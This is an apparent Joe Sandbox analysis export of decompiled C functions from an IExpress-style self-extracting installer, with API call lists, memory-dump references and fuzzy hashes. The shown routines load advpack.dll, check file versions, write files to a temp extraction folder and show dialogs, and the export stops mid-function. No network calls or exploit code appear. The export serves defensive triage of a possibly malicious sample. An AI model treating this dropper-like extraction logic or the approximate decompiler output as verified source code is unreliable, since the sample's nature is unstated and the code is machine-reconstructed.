                                                                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				CHAR* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t27 = __esi;
                                                                                                                                                                                                                                                				_t18 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				E00051781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                                				_t26 = "advpack.dll";
                                                                                                                                                                                                                                                				E0005658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                                				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000564DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000564F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00056502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-258089097
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000528E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                				long _t68;
                                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                                                                				intOrPtr _t99;
                                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                                                                				_t99 = __ecx;
                                                                                                                                                                                                                                                				_t106 = 0;
                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				_t103 = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_t106 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                                						if(E00052773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                                						_v28 = _t68;
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_t99 = _v16;
                                                                                                                                                                                                                                                							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                                							_t93 = _v24;
                                                                                                                                                                                                                                                							_t87 = _v20;
                                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                                							if(_t103 != 0) {
                                                                                                                                                                                                                                                								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                                								_v36 = _t73;
                                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                                										L15:
                                                                                                                                                                                                                                                										GlobalUnlock(_t103);
                                                                                                                                                                                                                                                										_t99 = _v16;
                                                                                                                                                                                                                                                										L18:
                                                                                                                                                                                                                                                										_t87 = _t87 + 1;
                                                                                                                                                                                                                                                										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										_v20 = _t87;
                                                                                                                                                                                                                                                										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                                											continue;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t79 = _v44;
                                                                                                                                                                                                                                                										_t88 = _t106;
                                                                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                                										_t101 = _v28;
                                                                                                                                                                                                                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                                										_t97 = _v48;
                                                                                                                                                                                                                                                										_v36 = _t83;
                                                                                                                                                                                                                                                										_t109 = _t83;
                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00052A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00052A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                                											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                                											_t88 = _t88 + 4;
                                                                                                                                                                                                                                                										} while (_t88 < 8);
                                                                                                                                                                                                                                                										_t87 = _v20;
                                                                                                                                                                                                                                                										_t106 = 0;
                                                                                                                                                                                                                                                										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                                												GlobalUnlock(_t103);
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												goto L15;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L15;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L20:
                                                                                                                                                                                                                                                				 *_a8 = _t87;
                                                                                                                                                                                                                                                				if(_t103 != 0) {
                                                                                                                                                                                                                                                					GlobalFree(_t103);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t106;
                                                                                                                                                                                                                                                			}


































                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00052A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharUpperA.USER32(5A679BD9,00000000,00000000,00000000), ref: 000527A8
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharNextA.USER32(0000054D), ref: 000527B5
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: CharNextA.USER32(00000000), ref: 000527BC
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052829
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052852
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052870
                                                                                                                                                                                                                                                  • Part of subcall function 00052773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000528A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00053938,?,?,?,?,-00000005), ref: 00052958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00052969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00053938,?,?,?,?,-00000005,?), ref: 00052A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00052A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 6c18da9d250fdf9dd59a4d3732409d83ccd39efd6eb008c429917ee9c087873e
                                                                                                                                                                                                                                                • Instruction ID: 703110ff8f360b558402684015111b2fcd9b2e8cc9216fd1c2737463b32ad439
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c18da9d250fdf9dd59a4d3732409d83ccd39efd6eb008c429917ee9c087873e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82513831E00219DBDB21CF98C884AAFFBB5FF49702F14412AE905E3251DB359D45DB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E00054169(void* __eflags) {
                                                                                                                                                                                                                                                				int _t18;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = E0005468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                                					if(E0005468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							return LocalFree(_t21);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(0x40);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t21);
                                                                                                                                                                                                                                                						_t18 = 0x3e9;
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						E000544B9(0, _t18);
                                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_t18 = 0x4b1;
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000530B4), ref: 00054189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000530B4), ref: 000541E7
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 91e6f0a8c5a153704c0a26800576b28f2fe3f5799f9383c350c7bf3f2b3a2c9e
                                                                                                                                                                                                                                                • Instruction ID: 78e6c9c0745857d22df5818314cbb61672b117cf2aee29d813d99f580c86f294
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e6f0a8c5a153704c0a26800576b28f2fe3f5799f9383c350c7bf3f2b3a2c9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA01D1B17407143BF72416658C9AFFB258EDBD579FF004125BF05E21C59A6CCC8941BA
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E000519E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t27 = __ebx;
                                                                                                                                                                                                                                                				_t11 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                                				_t34 = _a4;
                                                                                                                                                                                                                                                				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                                					E000543D0(_t34, _t15);
                                                                                                                                                                                                                                                					_v520 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x59a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                                					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if(_t14 != 1) {
                                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t32 = _a12;
                                                                                                                                                                                                                                                						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							_t23 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00051A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00051A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00051A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00051A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00051A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 801a382fd3d9d1ed062fa75757ab156ce17e23b82ad31c2ce7dd199406c874b4
                                                                                                                                                                                                                                                • Instruction ID: 2d4e159fff66f5a927abcd9a7ab24052979c67c73527c40b98549dd417be6a1e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 801a382fd3d9d1ed062fa75757ab156ce17e23b82ad31c2ce7dd199406c874b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2311A131601209AFEB51EF64DD08BEF7BB8EF4A312F108254FD2297191DA349E05CB96
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E000563C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				long _v272;
                                                                                                                                                                                                                                                				void* _v276;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t15 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                                				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_v276 = _a16;
                                                                                                                                                                                                                                                				_t37 = 1;
                                                                                                                                                                                                                                                				E00051781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                                				E0005658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                                					_t28 = _a4;
                                                                                                                                                                                                                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                                						 *0x59124 = 0x80070052;
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					CloseHandle(_t39);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					 *0x59124 = 0x80070052;
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                                0x00056444
                                                                                                                                                                                                                                                0x00056492

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0005647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000563EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-2312194364
                                                                                                                                                                                                                                                • Opcode ID: b6f37f911c287b6a7a704e6170b117ea913fbfd745933725a423e7f5867cd330
                                                                                                                                                                                                                                                • Instruction ID: a13a29e4bee2ad52afde1b0bcd670d76c7cbdfcd36c7222c28c83ce599dec5ab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6f37f911c287b6a7a704e6170b117ea913fbfd745933725a423e7f5867cd330
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7210571A0021CABDB10DF25DC85FEB77BCEB45312F004269F984A3180DAB55D888F64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000547E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                                				void _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t25;
                                                                                                                                                                                                                                                				struct HWND__* _t26;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                                					_t22 = _t33;
                                                                                                                                                                                                                                                					_t27 = _t22 + 1;
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t6 =  *_t22;
                                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                                					} while (_t6 != 0);
                                                                                                                                                                                                                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                                					 *_t34 = _t24;
                                                                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                                                                						_t28 = _t33;
                                                                                                                                                                                                                                                						_t19 = _t28 + 1;
                                                                                                                                                                                                                                                						do {
